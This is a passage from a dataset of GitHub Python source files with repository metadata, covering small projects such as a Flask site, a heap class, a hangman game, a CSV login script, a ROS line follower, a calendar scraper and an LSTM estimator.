time.sleep(1)","repo_name":"tA-bot-git/zk","sub_path":"client.py","file_name":"client.py","file_ext":"py","file_size_in_byte":1323,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"17439994932","text":"import os\nimport json\n\n# Importing flask class\nfrom flask import Flask, render_template, request, flash\n\n# Creating instance of this and storing in a var called app\n# First argument of the Flask class is the name of the applications module\napp = Flask(__name__)\napp.secret_key = \"some_secret\"\n\n# A decorator starts with the @ sign, which is also called pie notation. 
\n@app.route(\"/\")\ndef index():\n return render_template(\"index.html\")\n\n\n@app.route(\"/about\")\ndef about():\n data = []\n with open(\"data/company.json\", \"r\") as json_data:\n data = json.load(json_data)\n \n return render_template(\"about.html\", page_title=\"About\", company=data)\n\n\n@app.route(\"/about/\")\ndef about_member(member_name):\n member = {}\n\n with open(\"data/company.json\", \"r\") as json_data:\n data = json.load(json_data)\n for obj in data:\n # if url in that particular element of array is equal to member_name, then member obj should equal our obj\n if obj[\"url\"] == member_name:\n member = obj\n\n return render_template(\"member.html\", member=member)\n\n\n@app.route(\"/contact\", methods=[\"GET\", \"POST\"])\ndef contact(): \n if request.method == \"POST\":\n flash(\"Thanks {}, we have received your message!\".format(\n request.form[\"name\"]))\n\n return render_template(\"contact.html\", page_title=\"Contact\")\n\n\n@app.route(\"/careers\")\ndef careers():\n return render_template(\"careers.html\", page_title=\"Careers\")\n\n# Name of the default module in Python.\nif __name__ == \"__main__\":\n app.run(host=os.environ.get('IP'),\n port=int(os.environ.get('PORT')),\n debug=True) \n'''\nif __name__ == \"__main__\":\n app.run(host='0.0.0.0', \n port=5000, \n debug=True)\n '''","repo_name":"terencecistudent/flask","sub_path":"run.py","file_name":"run.py","file_ext":"py","file_size_in_byte":1787,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"37452750230","text":"class minHeap():\r\n def __init__(self):\r\n self.size = 0 \r\n self.heap = []\r\n self.pos = dict()\r\n \r\n def parent(self, pos):\r\n if(pos==0):\r\n return -1\r\n return (pos-1)//2\r\n\r\n def left(self, pos):\r\n ans = 2*pos+1\r\n if(ans>=self.size):\r\n return -1\r\n return ans\r\n\r\n def right(self, pos):\r\n ans = 2*pos+2\r\n if(ans>=self.size):\r\n return -1\r\n return ans\r\n\r\n def swap(self, i, j):\r\n self.pos[self.heap[i][1]] = j\r\n self.pos[self.heap[j][1]] = i\r\n self.heap[i], self.heap[j] = self.heap[j], self.heap[i]\r\n\r\n #Insert while maintaining heap property.\r\n #Value will be the weight or distance.\r\n def insert(self, val, vertex):\r\n self.size+=1\r\n self.heap.append([val, vertex])\r\n curr = self.size-1\r\n self.pos[vertex] = curr\r\n \r\n #The case if its the first element that we inserted\r\n if(self.parent(curr)==-1):\r\n return\r\n\r\n while(self.parent(curr)!=-1):\r\n if(self.heap[curr][0] < self.heap[self.parent(curr)][0]):\r\n self.swap(curr, self.parent(curr))\r\n curr = self.parent(curr)\r\n else:\r\n break\r\n \r\n #It takes in a position in array and fixes the heap formed from this node as root assuming all below are in order.\r\n def minHeapify(self, pos):\r\n left = self.left(pos)\r\n right= self.right(pos)\r\n\r\n #No child\r\n if(left==-1):\r\n return\r\n #No right child\r\n elif(right==-1):\r\n if(self.heap[left][0]self.heap[pos][0]):\r\n self.swap(self.parent(pos), pos)\r\n pos=self.parent(pos)\r\n else:\r\n break\r\n","repo_name":"abhibhargav29/DataStructures","sub_path":"9.2)ModifiedHeap.py","file_name":"9.2)ModifiedHeap.py","file_ext":"py","file_size_in_byte":2966,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"74172686249","text":"import os\nimport json\nimport numpy as np\nfrom PIL import Image\n\n\ndef rle_decode(rle, shape):\n s = rle.split()\n starts, lengths = [np.asarray(x, dtype=int) for x in (s[0:][::2], 
s[1:][::2])]\n starts -= 1\n ends = starts + lengths\n img = np.zeros(shape[0]*shape[1], dtype=np.uint8)\n for lo, hi in zip(starts, ends):\n img[lo:hi] = 1\n return img.reshape(shape)\n\n\nif __name__ == \"__main__\":\n\n # Just for completeness, here we show how the rle encoded mask\n # is transformed back to a numpy array\n\n # Read the submission.json file generated by the\n # 'prepare_submission.py' script\n with open('./predictions/submission.json', 'r') as f:\n submission_dict = json.load(f)\n\n img_name = 'arr_mask_example'\n img_shape = submission_dict[img_name]['shape']\n\n rle_encoded_crop = submission_dict[img_name]['segmentation']['crop']\n rle_encoded_weed = submission_dict[img_name]['segmentation']['weed']\n\n # Reconstruct crop and weed binary masks\n crop_mask = rle_decode(rle_encoded_crop, shape=img_shape)\n weed_mask = rle_decode(rle_encoded_weed, shape=img_shape)\n\n # Reconstruct original mask\n # weed_mask * 2 allows to convert ones into target 2 (weed label)\n reconstructed_mask = crop_mask + (weed_mask * 2)\n\n # Check that the RLE decoded mask is the same of the original mask\n # before the RLE encoding\n original_mask = np.load('./predictions/arr_mask_example.npy')\n\n np.testing.assert_allclose(original_mask, reconstructed_mask)\n\n # Just for visualisation purposes, save RGB reconstructed mask\n # Use again the dictionary in 'RGBtoTarget.txt'.\n reconstructed_rgb_arr = np.zeros(shape=img_shape + [3])\n reconstructed_rgb_arr[reconstructed_mask == 1] = [255, 255, 255]\n reconstructed_rgb_arr[reconstructed_mask == 2] = [216, 67, 82]\n\n reconstructed_rgb_img = Image.fromarray(\n np.uint8(reconstructed_rgb_arr))\n reconstructed_rgb_img.save('./predictions/rle_decoded_rgb_mask.png')\n\n # Please notice that the 'unknown' class corresponding to the\n # RGB value [216, 124, 18] is not considered for the evaluation\n # and thus does not appear in the reconstructed mask.\n","repo_name":"Desno365/Deep-Learning-2020-AN2DL-project","sub_path":"homework2/starting_kit/decode_rle_example.py","file_name":"decode_rle_example.py","file_ext":"py","file_size_in_byte":2176,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"72686818728","text":"#Imports-----------------------------------------------------------------------\r\nimport pandas as pd\r\nimport xml.etree.ElementTree as ET\r\nfrom lxml import etree\r\nimport string\r\nfrom collections import defaultdict\r\nimport gensim\r\nimport numpy as np\r\n\r\n\r\n#Helper Functions--------------------------------------------------------------\r\ndef clean_word(w):\r\n strip_str = \"()\\\".?!,;\"\r\n new_word = \"\".join((c for c in w if c in string.printable))\r\n return new_word.strip(strip_str).lower()\r\n\r\ndef clean_text_list(doc):\r\n words = doc.split()\r\n clean_words = [clean_word(word) for word in words]\r\n return clean_words\r\n\r\ndef xml2df(xml_data):\r\n tree = ET.parse(xml_data)\r\n root = tree.getroot()\r\n all_records = []\r\n headers = []\r\n for i, child in enumerate(root):\r\n record = []\r\n for subchild in child:\r\n record.append(subchild.text)\r\n if subchild.tag not in headers:\r\n headers.append(subchild.tag)\r\n all_records.append(record)\r\n return pd.DataFrame(all_records, columns=headers)\r\n\r\ndef trainModel(fname):\r\n try:\r\n df = xml2df(fname)\r\n except:\r\n print(\"Data not found\")\r\n return\r\n\r\n #Training the Model------------------------------------------------------------\r\n text = df['Text'].as_matrix()\r\n sentences = 
[clean_text_list(doc) for doc in text if type(doc) == str]\r\n model = gensim.models.Word2Vec(sentences, size=300, window=5, min_count=5)\r\n model.save('SavedModel')\r\n return\r\n\r\n#End Script--------------------------------------------------------------------\r\n","repo_name":"zachdtaylor/MathArticleCategorizer","sub_path":"ModeltoFile.py","file_name":"ModeltoFile.py","file_ext":"py","file_size_in_byte":1595,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"72310064169","text":"n = int(input())\nX = [float(x) for x in input().strip().split()]\nY = [float(y) for y in input().strip().split()]\ndi = 0;\n\ncloneX = X.copy()\ncloneY = Y.copy()\ncloneX.sort()\ncloneY.sort()\n\nfor i in range(n):\n di += ((cloneX.index(X[i]) + 1) - (cloneY.index(Y[i]) + 1)) **2\n\n#calculate the result using pearman's rank correlation coefficient formula\nresult = 1 - ((6 * di) / (n * (n ** 2 -1)))\nprint(\"%.3f\"%result)\n","repo_name":"chinshanhong/HackerRank","sub_path":"10 Days of Statistics/Day 7: Spearman's Rank Correlation Coefficient.py","file_name":"Day 7: Spearman's Rank Correlation Coefficient.py","file_ext":"py","file_size_in_byte":415,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"31096646108","text":"#this is a console based hangman game.\r\n#I've made a list with 10 different car names.\r\n\r\n\r\nimport random\r\ncars =['bugatti','ferrari','mercedes','audi','lamborghini','rolls-royce','tata','ford','renault','jaguar','lexus','toyota']\r\ns= random.choice(cars)\r\ndash=len(s)*'_'\r\nresult=list(dash)\r\ncount=4\r\n\r\nwhile count>0:\r\n n=0\r\n print('you have '+ str(count)+ ' guess left')\r\n x=input(\"your guess: \")\r\n\r\n for i in range(len(s)):\r\n if(x==s[i]):\r\n result[i]=x\r\n print(result[i],end='')\r\n else:\r\n print(result[i],end='')\r\n n=n+1\r\n print('\\n')\r\n if n==len(s):\r\n count=count-1\r\n\r\n if(list(s)==result):\r\n print(\"Successsssss\")\r\n break\r\n\r\nif count==0:\r\n print('loseeeeee')\r\n\r\n","repo_name":"NirmalGelal/Hangman","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":769,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"41977674591","text":"import csv\n\ndef nieuwe_gebruiker():\n\n list = []\n\n with open(\"login.csv\", \"r\") as myCSVFile:\n reader = csv.reader(myCSVFile, delimiter=\";\")\n for row in reader:\n for field in row:\n list.append(field)\n myCSVFile.close()\n\n while True:\n naam = raw_input(\"wat voor gebruikersnaam wilt u: \")\n\n if naam in list:\n print(\"deze naam is al in gebruik\")\n\n else:\n wachtwoord = raw_input(\"wat voor wachtwoord wilt u: \")\n with open(\"login.csv\", \"a\") as meCSVFile:\n writer = csv.writer(meCSVFile, delimiter=\";\")\n writer.writerow((naam, wachtwoord))\n break\n\ndef inloggen():\n\n list = []\n wachtwoordList = []\n naamList = []\n\n with open(\"login.csv\", \"r\") as myCSVFile:\n reader = csv.reader(myCSVFile, delimiter=\";\")\n for row in reader:\n for field in row:\n list.append(field)\n myCSVFile.close()\n\n teller = 0\n teller2 = 1\n\n while teller2 < len(list):\n wachtwoordList.append(list[teller2])\n naamList.append(list[teller])\n teller += 2\n teller2 += 2\n\n naam = raw_input(\"wat is de gebruikersnaam: \")\n wachtwoord = raw_input(\"wat is het wachtwoord: \")\n\n if wachtwoord in wachtwoordList and naam in naamList:\n teller = naamList.index(naam)\n if wachtwoord == 
wachtwoordList[teller]:\n print(\"Uw bent ingelogt\")\n\n else:\n print(\"Het wachtwoord of de gebruikersnaam is fout2\")\n\n else:\n print(\"het wachtwoord of de gebruiksnaam is fout\")\n\nwhile True:\n print(\"1. inloggen\")\n print(\"2. nieuwe gebruiker\")\n print(\"3. quit\")\n keuze = input(\"keuze: \")\n\n if keuze == 2:\n nieuwe_gebruiker()\n elif keuze == 1:\n inloggen()\n elif keuze == 3:\n break\n\n","repo_name":"tempestium/Git","sub_path":"Super-Wonder-Captain/login.py","file_name":"login.py","file_ext":"py","file_size_in_byte":1900,"program_lang":"python","lang":"nl","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"35588246776","text":"t = int(input())\nfor _ in range(t):\n\n n,m = map(int,input().split())\n # case1) DP로 풀기\n dp = [[0]*(m+1) for _ in range(n+1)]\n # 0 1 2 3 4 m\n # 1 1 2 3 4 5 6 7\n # 2 0 1 3 6 10 15 21 ...\n # 3 0 1\n # n 1\n for i in range(n+1):\n for j in range(m+1):\n if i == 1:\n dp[1][j] = j # 서쪽이 1개면, 동쪽루트는 동쪽 다리개수만큼\n \n elif i == j: # 같은 다리 수면, 모든 경우 1\n dp[i][j] = 1\n \n elif i100].sort_values('Correlation'\r\n ,ascending=False)\r\n\r\nprint(a.head())\r\nprint('\\n')\r\n\r\ncorr_liarliar = pd.DataFrame(similar_to_liarliar,columns=['Correlation'])\r\ncorr_liarliar.dropna(inplace=True)\r\ncorr_liarliar = corr_liarliar.join(ratings['num of ratings'])\r\nb=corr_liarliar[corr_liarliar['num of ratings']>100].sort_values('Correlation'\r\n ,ascending=False)\r\nprint(b.head())","repo_name":"thelewlew98/data_science_python_ML","sub_path":"film_recommendation/recommender_systems.py","file_name":"recommender_systems.py","file_ext":"py","file_size_in_byte":1927,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"26233884648","text":"#!/usr/bin/env python\nfrom __future__ import print_function\nimport roslib\nroslib.load_manifest('create_eyes')\nimport timeit\nimport sys\nimport rospy\nimport cv2\nfrom std_msgs.msg import String\nfrom geometry_msgs.msg import Twist\nfrom std_msgs.msg import Float32\nfrom std_msgs.msg import Float64\nfrom sensor_msgs.msg import Image\nfrom std_msgs.msg import Bool\nfrom cv_bridge import CvBridge, CvBridgeError\nimport numpy\nimport math\n\n\nclass line_extractor:\n\n\n def __init__(self):\n self.bridge = CvBridge()\n self.image_sub = rospy.Subscriber(\"/raspicam_node/image_raw\",Image,self.callback)\n# self.control_effort_sub = rospy.Subscriber(\"/control_effort\", Float64, self.control_callback);\n\n #print(\"Param is\", rospy.get_param('default_param', 'default_value'));\n show_images_from_param = rospy.get_param('~show_images', 'False')\n rospy.loginfo('Parameter %s has value %s', rospy.resolve_name('~show_images'), show_images_from_param)\n self.showImages = bool(show_images_from_param);\n\n use_pid_from_param = rospy.get_param('~use_pid', 'True');\n self.use_pid = bool(use_pid_from_param);\n\n self.image = None;\n self.SCALE_FACTOR = 4;\n self.gray_image = None;\n self.prevCx = None;\n self.direction = 0\n self.lineFound = False;\n self.err_pub = rospy.Publisher('line_error', Float32, queue_size=1)\n self.pid_state_pub = rospy.Publisher('state', Float64, queue_size=1)\n self.pid_setpoint_pub = rospy.Publisher('setpoint', Float64, queue_size=1)\n self.line_state_pub = rospy.Publisher('line_visible', Bool, queue_size = 1);\n\n self.twist = Twist()\n\n#def control_callback(self,msg):\n# ctrl_effort = msg.data;\n# print(\"Control Effort is: \" , ctrl_effort); \n\n def callback(self,msg):\n\n #start_time = timeit.default_timer()\n\n kernel = 
numpy.ones((3,3),numpy.uint8)\n image = self.bridge.imgmsg_to_cv2(msg,desired_encoding='bgr8')\n \n image = cv2.resize(image,(int(320/self.SCALE_FACTOR),int(240/self.SCALE_FACTOR)));\n \n hsv = cv2.cvtColor(image, cv2.COLOR_BGR2HSV)\n hue_img, sat_img, v_img = cv2.split(hsv) # extracting red channel\n \n\n #ret,th1 = cv2.threshold(blur,0,255,cv2.THRESH_OTSU)#using threshold remove noise\n \n #closing = cv2.morphologyEx(th1, cv2.MORPH_CLOSE, kernel)\n #closing = cv2.morphologyEx(closing, cv2.MORPH_CLOSE, kernel)\n \n lower_sat = numpy.array([220])\n upper_sat = numpy.array([255])\n\n sat_mask = cv2.inRange(sat_img, lower_sat, upper_sat);\n\n lower = numpy.uint8([0, 120, 120])\n upper = numpy.uint8([255, 255, 255])\n\n #yellow_mask = cv2.inRange(hsv, lower_yellow, upper_yellow);\n #masked = cv2.bitwise_and(image, image, mask = yellow_mask)\n\n yellow_mask = cv2.inRange(image, lower, upper);\n if(self.showImages):\n cv2.imshow('sat',sat_mask);\n cv2.waitKey(3);\n #sat_masked = cv2.bitwise_and(image,image,mask=sat_mask);\n masked = cv2.bitwise_and(sat_mask, sat_mask, mask = yellow_mask)\n\n masked=cv2.GaussianBlur(masked,(3,3),2)#blur the grayscale image\n masked = cv2.morphologyEx(masked,cv2.MORPH_ERODE, kernel)\n #yellow_mask = cv2.inRange(image, lower, upper)\n if(self.showImages):\n cv2.imshow('y',masked);\n cv2.waitKey(3)\n #mask = closing;\n mask = masked;\n\n h, w, d = image.shape\n if(self.use_pid):\n self.pid_setpoint_pub.publish(float(w)/2.0);\n search_top = 0;\n search_bot = 2*h/3;\n search_left = w/4;\n search_right = 3*w/4;\n mask[0:search_top, 0:w] = 0\n mask[search_bot:h, 0:w] = 0\n mask[0:h, 0:search_left] = 0\n mask[0:h, search_right:w] = 0\n if(self.showImages):\n cv2.imshow(\"a\",mask);\n cv2.waitKey(3);\n M = cv2.moments(mask)\n if M['m00'] > 0:\n cx = int(M['m10']/M['m00'])\n cy = int(M['m01']/M['m00'])\n \n if(self.use_pid):\n self.pid_state_pub.publish(float(cx));\n #The proportional controller is implemented in the following four lines which\n #is reposible of linear scaling of an error to drive the control output.\n cv2.circle(image, (int(cx), int(cy)), 5, (0,0,255), -1) \n\n\t\n if self.prevCx is None:\n self.prevCx = cx;\n \n#smoothing cx\n\n cx = self.prevCx*0.5 + cx*0.5;\n\n self.prevCx = cx;\n\n err = cx - w/2\n\n err = self.SCALE_FACTOR * err;\n\n self.line_state_pub.publish(True);\n if(not self.use_pid):\n self.err_pub.publish(err);\n#print(\"Err is: \", err);\n\n else: #Moment not available. Probably, line isn't there\n err = -1000.0;\n self.line_state_pub.publish(False);\n self.err_pub.publish(err);\n \n if(self.showImages):\n cv2.imshow(\"window\", image)\n cv2.waitKey(3)\n\ndef main(args):\n rospy.init_node('line_extractor', anonymous=True)\n ic = line_extractor()\n try:\n rospy.spin()\n except KeyboardInterrupt:\n rospy.loginfo(\"Shutting down\")\n cv2.destroyAllWindows()\n\nif __name__ == '__main__':\n main(sys.argv)\n\n","repo_name":"hs29590/create_eyes","sub_path":"src/followLine2.py","file_name":"followLine2.py","file_ext":"py","file_size_in_byte":4946,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"70314979368","text":"import math\n\ndef calculate_haversine(lon1, lat1, lon2, lat2):\n dlon = lon2 - lon1\n dlat = lat2 - lat1\n a = math.sin(dlat / 2) ** 2 + math.cos(lat1) * math.cos(lat2) * math.sin(dlon / 2) ** 2\n c = 2 * math.asin(math.sqrt(a))\n r = 6371 # Radius of earth in kilometers. 
Use 3956 for miles\n return c * r\n\n\ndef split_string(string):\n return string.split(',')\n\n\ndef removeDEfromsortedDEs(assigned_executive, DEs):\n for de in DEs:\n if de.id == assigned_executive:\n DEs.remove(de)\n return DEs\n","repo_name":"kloudd/deliveryAssignment","sub_path":"utility_functions.py","file_name":"utility_functions.py","file_ext":"py","file_size_in_byte":531,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"9396168699","text":"\"\"\"File containing all weather inforamtion and modifiers\"\"\"\n\nclass Weather():\n \"\"\"defines all the available weathers\"\"\"\n\n def __init__(self, name, min_duration, max_duration, temp_modifier, humidity_modifier, icon_filepath=None):\n \"\"\"containes all referances to all the information kept with all individual weather options\n \n arg:\n name(str) = the name of the weather\n min_duration(int) = minimum amount of time the weather lasts for\n max_duration(int) = maximum amount of time the weather lasts for\n temp_modifier(int) = value to modify the base temp of the hex biome\n humidity_modifier(int) = value to modify the base humidity of the hex biome\n icon_filepath(str) = location of the icon associated with the weather\n \n return:\n (Weather) = returns list of allowable weathers\n \"\"\"\n \n self.name = name\n self.min_duration = min_duration\n self.max_duration = max_duration\n self.temp_modifier = temp_modifier\n self.humidity_modifier = humidity_modifier\n self.icon_filepath = icon_filepath\n\n\nif __name__ == '__main__':\n test_weather = Weather(\"mountain\", 2, 6, 5, 30, \"test\")\n ","repo_name":"lowear/dnd_weather_tool","sub_path":"weather.py","file_name":"weather.py","file_ext":"py","file_size_in_byte":1260,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"38540927899","text":"#from icalendar import Calendar, Event\nfrom ics import Calendar, Event\nfrom urllib.request import urlretrieve\nfrom lxml import etree\nimport os\nimport time\nimport re\nimport datetime\nimport arrow\n\ndef display(cal):\n return cal.to_ical().decode('utf-8').replace('\\r\\n', '\\n').strip()\n\ndef getCal(regex):\n file='cache.html'\n details_cache='details.txt'\n\n format=\"%d.%m.%Y %H:%M\"\n\n if not os.path.exists(file) or time.time()-os.path.getmtime(file)>60:\n print('cache too old')\n urlretrieve('http://www.gullivers.banda.cz/nejblizsi-akce/',file)\n else:\n print('using cache')\n\n\n htmlparser = etree.HTMLParser(encoding='utf-8')\n tree = etree.parse(file,htmlparser)\n res=tree.xpath('//div[@class=\"event fulllist underline\"]')\n #res=tree.xpath('//body')\n\n details=[]\n for line in open(details_cache,'r',encoding='utf-8').readlines():\n s=line.replace('\\n','').split('\\t')\n #print(s)\n if time.time()-datetime.datetime.strptime(s[2], format).timestamp()<60*30:\n details.append((s[0],s[1],s[2]))\n\n #print(details)\n\n cal = Calendar()\n\n for event in res:\n title=event[0][0].text\n if re.search(regex,title):\n url=event[0][0].items()[0][1]\n timenode=event[1][0].xpath('node()')[1].replace(' - \\n ','')\n interval=timenode.split(' - ')\n print(title,event[1][0][0].text,timenode,url)\n start_time=datetime.datetime.strptime(interval[0], format)\n try:\n end_time=datetime.datetime.strptime(interval[1], format)\n except ValueError:\n end_time=datetime.datetime.strptime(interval[1], \"%H:%M\")\n end_time=end_time.replace(day=start_time.day,month=start_time.month,year=start_time.year)\n #print(dir(event[1][0]))\n 
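# both interval endpoints are parsed above; an end time lacking a date inherits the start date in the except branch\n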
print(start_time,' - ',end_time)\n\n #print('')\n\n find=list(filter(lambda x: x[1]==url,details))\n if len(find):\n location=find[0][0]\n #'http://www.gullivers.banda.cz'\n else:\n urlretrieve('http://www.gullivers.banda.cz'+url,'tmp')\n tree = etree.parse('tmp', htmlparser)\n res = tree.xpath('//p[@class=\"location\"]')\n details.append((res[0].text,url,datetime.datetime.fromtimestamp(time.time()).strftime(format)))\n location=res[0].text\n print(location)\n\n\n event = Event(location=location)\n event.name=title\n event.begin = arrow.get(start_time,'Europe/Prague')\n event.end = arrow.get(end_time,'Europe/Prague')\n\n cal.events.append(event)\n\n with open(details_cache,'w',encoding='utf-8') as d:\n for detail in details:\n for col in detail:\n d.write(col+'\\t')\n d.write('\\n')\n\n with open('my.ics', 'w', encoding='utf-8') as my_file:\n my_file.writelines(cal)\n\n return\n\n\n\n","repo_name":"mittermichal/banda-ical","sub_path":"banda_parser.py","file_name":"banda_parser.py","file_ext":"py","file_size_in_byte":2708,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"30887361418","text":"from flask import Blueprint, request, jsonify\nfrom .controllers.reserva_controller import guardar_reserva\n\n# Crear el Blueprint para las rutas del restaurante\nrestaurante_bp = Blueprint('restaurante', __name__)\n\n# Ruta para recibir los datos del formulario de reserva\n@restaurante_bp.route('/reservas', methods=['POST'])\ndef reservas():\n nombre = request.form.get('nombre')\n correo = request.form.get('correo')\n numero = request.form.get('numero')\n\n # Validar los datos del formulario\n\n # Guardar la reserva en la base de datos\n reserva_id = guardar_reserva(nombre, correo, numero)\n\n # Realizar otras acciones necesarias\n\n # Devolver una respuesta JSON\n return jsonify({'message': 'Reserva exitosa', 'reserva_id': reserva_id})\n\n# Resto de las rutas y lógica del restaurante...\n\n","repo_name":"7dead7/carrizales","sub_path":"backend/api/routes.py","file_name":"routes.py","file_ext":"py","file_size_in_byte":806,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"8135023957","text":"import os\nimport random\nimport argparse\nimport numpy as np\nimport json\nimport torch\nimport joblib\nimport time\n\nfrom sklearn.metrics import mean_squared_error\nimport matplotlib.pyplot as plt\n\nfrom util_dev import device\nfrom utils import min_max_scale, custom_scale, preprocess_datasets, preprocess_input_dataset, setup_log\nfrom RNNEncoderDecoder import EncoderRNN, AttnDecoderRNN\n\ndef predict(encoder, decoder, input_tensor, output_length):\n with torch.no_grad():\n bz = input_tensor.size(0)\n\n outputs = torch.zeros(bz, output_length, device=device)\n\n encoder_outputs, encoder_hidden, encoder_cell = encoder(input_tensor)\n\n decoder_hidden = encoder_hidden[-1]\n decoder_cell = encoder_cell[-1]\n #decoder_attentions = torch.zeros(input_length, input_length)\n decoder_input = input_tensor[:, -1].view(-1,1)\n\n for di in range(output_length):\n decoder_output, decoder_hidden, decoder_cell, decoder_attention = decoder(\n decoder_input, decoder_hidden, decoder_cell, encoder_outputs)\n #decoder_attentions[di] = decoder_attention.data\n decoder_input = decoder_output.detach().view(-1,1)\n outputs[:, di] = decoder_input[:,0]\n\n return outputs \n\ndef prediction(encoder, decoder, data_loader, scale_type=0, out_scale=None, output_length=5, \n has_target=False, wmti_ranges=[[0, 1], [0, 4], [0, 
3], [0, 3], [0, 1]], intercept=None, encoder_file='', \n decoder_file='', encoder_ckpt='', decoder_ckpt='', logger=None, save_dir=''):\n\n if os.path.isfile(encoder_file) and os.path.isfile(decoder_file):\n encoder.load_state_dict(torch.load(encoder_file, map_location=device))\n decoder.load_state_dict(torch.load(decoder_file, map_location=device))\n elif os.path.isfile(encoder_ckpt) and os.path.isfile(decoder_ckpt):\n checkpoint1 = torch.load(encoder_ckpt, map_location=device)\n encoder.load_state_dict(checkpoint1['model_state_dict'])\n checkpoint2 = torch.load(decoder_ckpt, map_location=device)\n decoder.load_state_dict(checkpoint2['model_state_dict']) \n else:\n print(\"No model files found!!!\")\n return False\n\n batch_errors = []\n for i, datas in enumerate(data_loader):\n input_tensor = datas[0].to(device) \n if has_target: \n bz = input_tensor.size(0)\n _index_in_batch = random.randint(0, bz-1)\n target_tensor = datas[1].to(device) \n targets = target_tensor.cpu().detach().numpy() \n\n outputs_ = predict(encoder, decoder, input_tensor, output_length) \n outputs = outputs_.cpu().detach().numpy()\n \n if scale_type == 1:\n outputs = custom_scale(outputs, out_scale, b=intercept, inverse_transform=True)\n if has_target: targets = custom_scale(targets, out_scale, b=intercept, inverse_transform=True)\n elif scale_type == 2:\n outputs=min_max_scale(outputs, multipler=out_scale, ranges=wmti_ranges, inverse_transform=True)\n if has_target: targets=min_max_scale(targets, multipler=out_scale, ranges=wmti_ranges, inverse_transform=True)\n\n if i==0: \n predictions = np.copy(outputs) \n if has_target: targets_all = np.copy(targets)\n else:\n predictions = np.concatenate((predictions, outputs), axis=0) \n if has_target: targets_all = np.concatenate((targets_all, targets), axis=0)\n\n if has_target:\n rmse = mean_squared_error(targets, outputs, squared=False)\n errs = mean_squared_error(targets, outputs, multioutput='raw_values', squared=False)\n batch_errors.append(rmse)\n if logger != None:\n logger.info(f\"--batch#{i}, mean errors: {errs}\")\n logger.info(f\"--batch#{i}, GT: {np.round(targets[_index_in_batch, :], 5)}\")\n logger.info(f\"--batch#{i}, PD: {np.round(outputs[_index_in_batch, :], 5)} \\n\")\n\n if has_target: \n plt.plot(batch_errors) \n plt.show() \n\n if os.path.isdir(save_dir) and has_target:\n np.save(f\"{save_dir}/wmti_target.npy\", targets_all)\n\n return predictions\n\ndef main(args):\n mode = \"estimation\"\n datapath = args.datapath\n model_path = os.path.join(datapath, args.model_folder)\n if not os.path.exists(model_path): os.mkdir(model_path) \n output_path = os.path.join(model_path, args.output_dir)\n if not os.path.exists(output_path): os.makedirs(output_path)\n logpath = output_path if args.logpath==None else args.logpath\n logger = setup_log(logpath, f\"{args.logname}-{mode}\")\n\n checkpoint_path = os.path.join(model_path, 'checkpoints')\n\n logger.info(f\"device: {device}\")\n logger.info(f\"model path: {model_path}\")\n \n with open(f\"{output_path}/estimation_args.json\", 'w') as jf:\n json.dump(args.__dict__, jf, indent=2)\n\n ## input normalization\n data_norm=args.data_normalizatioin \n dki_norm_scaler_file = None\n dki_norm_scaler = None\n if args.dki_scaler_filename: \n dki_norm_scaler_file = f\"{checkpoint_path}/{args.dki_scaler_filename}\"\n dki_norm_scaler = joblib.load(dki_norm_scaler_file)\n logger.info(f\"data norm: {data_norm}, dki normalization scaler: {dki_norm_scaler_file}\")\n\n ## output scaling\n scale_type = args.output_scale_type \n out_scale 
= args.out_scale \n intercept = args.out_intercept \n logger.info(f\"scale_type: {scale_type}, target scale: {out_scale}, intercept: {intercept}\")\n\n dataset_fn = args.dataset \n batch_size= args.batch_size\n has_target=args.has_target\n\n logger.info(f\"dataset: {dataset_fn}, batch size: {batch_size}\")\n\n if has_target:\n data_loader, _, _, _ = preprocess_datasets(datapath, mat_filename=dataset_fn, batch_size=batch_size, train_perc=0.95, val_perc=0.01,\n data_norm=data_norm, scale_type=scale_type, scale=out_scale, intercept=intercept, \n dki_norm_type=args.input_scale_type, x_scaler=dki_norm_scaler) \n else:\n data_loader, dki, _ = preprocess_input_dataset(datapath, mat_filename=dataset_fn, batch_size=batch_size, x_scaler=dki_norm_scaler, dki_norm_type=args.input_scale_type) \n ##\n hidden_size = args.hidden_size\n norm = args.model_normalization\n input_seq_length = args.input_seq_length\n output_seq_length = args.output_seq_length \n \n encoder = EncoderRNN(1, hidden_size, seq_length=input_seq_length, normalization=norm, num_layers=1).to(device)\n attn_decoder = AttnDecoderRNN(hidden_size, 1, x_seq_length=input_seq_length, dropout=args.dropout, normalization=norm).to(device)\n\n ckpt_epoch = args.load_checkpoint\n enc_ckt = f'{checkpoint_path}/ckpt_ep-{ckpt_epoch}_encoder.pt' if ckpt_epoch > 0 else ''\n dec_ckt = f'{checkpoint_path}/ckpt_ep-{ckpt_epoch}_decoder.pt' if ckpt_epoch > 0 else ''\n enc_file= f'{checkpoint_path}/lstm_encoder.pt' if ckpt_epoch <= 0 else ''\n dec_file = f'{checkpoint_path}/lstm_decoder.pt' if ckpt_epoch <= 0 else '' \n t_ = time.time()\n wmti = prediction(encoder, attn_decoder, data_loader, scale_type, out_scale, logger=logger, has_target=has_target, intercept=intercept, output_length=output_seq_length,\n encoder_file=enc_file, decoder_file=dec_file, encoder_ckpt=enc_ckt, decoder_ckpt=dec_ckt, save_dir=output_path) \n logger.info(f\"Estimation 